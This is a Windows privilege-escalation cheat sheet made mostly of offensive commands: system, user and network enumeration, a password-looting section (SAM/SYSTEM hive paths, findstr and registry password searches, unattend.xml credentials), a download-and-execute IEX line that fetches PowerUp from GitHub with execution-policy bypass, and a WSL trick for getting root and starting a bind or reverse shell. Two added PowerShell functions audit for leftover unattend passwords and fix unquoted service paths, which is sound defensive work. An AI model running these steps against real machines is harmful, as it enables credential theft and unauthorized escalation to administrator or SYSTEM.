# Windows - Privilege Escalation
## Windows Version and Configuration
```powershell
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic qfe
```
Architecture
```powershell
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
```
List all env variables
```powershell
set
Get-ChildItem Env: | ft Key,Value
```
List all drives
```powershell
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
```
## User Enumeration
Get current username
```powershell
echo %USERNAME% || whoami
$env:username
```
List user privilege
```powershell
whoami /priv
```
List all users
```powershell
net user
net users
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
```
List logon requirements (lockout threshold, password policy); usable for bruteforcing
```powershell
net accounts
```
Get details about a user (e.g. administrator, admin, current user)
```powershell
net user administrator
net user admin
net user %USERNAME%
```
List all local groups
```powershell
net localgroup
Get-LocalGroup | ft Name
```
Get details about a group (e.g. administrators)
```powershell
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
```
## Network Enumeration
List all network interfaces, IP, and DNS.
```powershell
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```
List current routing table
```powershell
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
```
List the ARP table
```powershell
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
```
List all current connections
```powershell
netstat -ano
```
List firewall state and current configuration
```powershell
netsh advfirewall firewall dump
```
List all network shares
```powershell
net share
```
SNMP Configuration
```powershell
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```
## Looting for passwords
### SAM and SYSTEM files
```powershell
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
```
### Search for file contents
```powershell
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
```
### Search for a file with a certain filename
```powershell
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
```
### Search the registry for key names
```powershell
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
```
### Read a value of a certain sub key
```powershell
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
```
### Passwords in unattend.xml
Location of the unattend.xml files
```powershell
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```
Example content
```xml
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
    <AutoLogon>
        <Password>*SENSITIVE*DATA*DELETED*</Password>
        <Enabled>true</Enabled>
        <Username>Administrateur</Username>
    </AutoLogon>
    <UserAccounts>
        <LocalAccounts>
            <LocalAccount wcm:action="add">
                <Password>*SENSITIVE*DATA*DELETED*</Password>
                <Group>administrators;users</Group>
                <Name>Administrateur</Name>
            </LocalAccount>
        </LocalAccounts>
    </UserAccounts>
```
The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
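As an added audit example (not part of the original cheat sheet), the following PowerShell function walks the unattend locations listed above and reports every `Password` element that sysprep did not scrub, so an image can be cleaned before deployment. The function name `Find-UnattendPassword` is hypothetical.

```powershell
# Added audit example, not from the original cheat sheet; the function name is hypothetical.
# Scans the well-known unattend/sysprep XML locations (sysprep.inf is INI, so it is skipped)
# and reports every <Password>/<AdministratorPassword> whose value sysprep did not scrub.
function Find-UnattendPassword {
    param(
        [string[]]$Paths = @(
            "$env:SystemDrive\unattend.xml",
            "$env:SystemRoot\Panther\Unattend.xml",
            "$env:SystemRoot\Panther\Unattend\Unattend.xml",
            "$env:SystemRoot\System32\sysprep\sysprep.xml"
        )
    )
    $scrubbed = '*SENSITIVE*DATA*DELETED*'   # marker sysprep leaves behind after cleaning
    foreach ($file in $Paths) {
        if (-not (Test-Path -LiteralPath $file)) { continue }
        try { $xml = [xml](Get-Content -LiteralPath $file -Raw -ErrorAction Stop) }
        catch { Write-Warning "Cannot parse ${file}: $_"; continue }

        # Unattend files are namespaced, so match on local element names.
        $xpath = '//*[local-name()="Password" or local-name()="AdministratorPassword"]'
        foreach ($node in $xml.SelectNodes($xpath)) {
            # Either <Password>text</Password> or <Password><Value/><PlainText/></Password>.
            $valueNode = $node.SelectSingleNode('*[local-name()="Value"]')
            $value = if ($valueNode) { $valueNode.InnerText } else { $node.InnerText }
            if ([string]::IsNullOrWhiteSpace($value) -or $value -eq $scrubbed) { continue }

            # PlainText=false only means base64 encoding, which is not protection.
            $plain = $node.SelectSingleNode('*[local-name()="PlainText"]')
            $owner = $node.ParentNode   # AutoLogon, LocalAccount, UserAccounts, ...
            $account = $owner.SelectSingleNode('*[local-name()="Username" or local-name()="Name"]')
            [pscustomobject]@{
                File     = $file
                Section  = $owner.LocalName
                Account  = if ($account) { $account.InnerText } else { '(n/a)' }
                Encoding = if ($plain -and $plain.InnerText -eq 'false') { 'base64' } else { 'plaintext' }
            }
        }
    }
}

# Any row returned is a credential to rotate and a file to remove from the image.
Find-UnattendPassword | Format-Table -AutoSize
```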
### IIS Web config
```powershell
Get-ChildItem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
```
## Processes Enumeration and Tasks
What processes are running?
```powershell
tasklist /v
net start
sc query
Get-Service
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
```
Which processes are running as "system"?
```powershell
tasklist /v /fi "username eq system"
```
Do you have powershell magic?
```powershell
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
```
List installed programs
```powershell
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
```
Scheduled tasks
```powershell
schtasks /query /fo LIST 2>nul | findstr TaskName
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```
Startup tasks
```powershell
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
```
## Using PowerSploit's PowerUp
Spot the weak service using PowerSploit's PowerUp
```powershell
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
```
## Using Windows Subsystem for Linux (WSL)
Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
> With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
```powershell
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
```
## Unquoted Service Paths
Microsoft Windows Unquoted Service Path Enumeration Vulnerability: every Windows service has a path to its executable. If that path is unquoted and contains whitespace or other separators, the service control manager resolves it ambiguously and will attempt to access a resource in the parent path first (e.g. `C:\Program.exe` before `C:\Program Files\...`).
```powershell
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
```
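As an added audit and remediation example (not from the original cheat sheet), the following PowerShell lists services whose unquoted image path contains spaces, reports which of the ambiguous parent directories broad groups (Users, Authenticated Users, Everyone) can write to, and with `-Fix` quotes the `ImagePath` in the registry. The function names `Test-UnquotedServicePath` and `Test-DirWritableByUsers` are hypothetical.

```powershell
# Added audit example, not from the original cheat sheet. Function names are hypothetical.
# Lists services whose unquoted image path contains spaces, reports which of the
# ambiguous parent directories broad groups can write to, and optionally quotes the path.
function Test-UnquotedServicePath {
    [CmdletBinding()]
    param([switch]$Fix)   # -Fix rewrites ImagePath with quotes (run elevated; restart needed)

    $services = Get-CimInstance -ClassName Win32_Service -Property Name,PathName,StartMode
    foreach ($svc in $services) {
        $path = $svc.PathName
        # Skip empty, already quoted, and space-free paths.
        if ([string]::IsNullOrWhiteSpace($path) -or $path.StartsWith('"')) { continue }
        $m = [regex]::Match($path, '^(.*?\.exe)', 'IgnoreCase')   # image path ends at first .exe
        if (-not $m.Success) { continue }
        $exe = $m.Groups[1].Value
        if ($exe -notmatch ' ') { continue }

        # Every space is a point where the path is truncated on the first lookup, e.g.
        # C:\Program Files\Some App\svc.exe -> C:\Program.exe, C:\Program Files\Some.exe
        $parts = $exe -split ' '
        $parents = for ($i = 1; $i -lt $parts.Count; $i++) {
            Split-Path -Parent (($parts[0..($i - 1)] -join ' ') + '.exe')
        }
        $writable = $parents | Sort-Object -Unique |
            Where-Object { (Test-Path -LiteralPath $_) -and (Test-DirWritableByUsers $_) }

        [pscustomobject]@{
            Name = $svc.Name; StartMode = $svc.StartMode; PathName = $path
            WritableParentDirs = ($writable -join ';')
        }
        if ($Fix) {
            $quoted = '"' + $exe + '"' + $path.Substring($exe.Length)
            Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)" `
                -Name ImagePath -Value $quoted
        }
    }
}

# True if Users, Authenticated Users or Everyone hold write-capable rights on the directory.
function Test-DirWritableByUsers([string]$Dir) {
    $broad = 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone'
    foreach ($ace in (Get-Acl -LiteralPath $Dir).Access) {
        if ($ace.AccessControlType -ne 'Allow' -or $broad -notcontains $ace.IdentityReference.Value) { continue }
        if ("$($ace.FileSystemRights)" -match 'Write|Modify|FullControl|CreateFiles') { return $true }
    }
    return $false
}

Test-UnquotedServicePath | Where-Object WritableParentDirs | Format-List
```

Services with a non-empty `WritableParentDirs` are the ones to quote first; services under `C:\Windows` are included here on purpose, since the `findstr` one-liner above excludes them.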
## References
* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
* [TOP-10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
* [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/)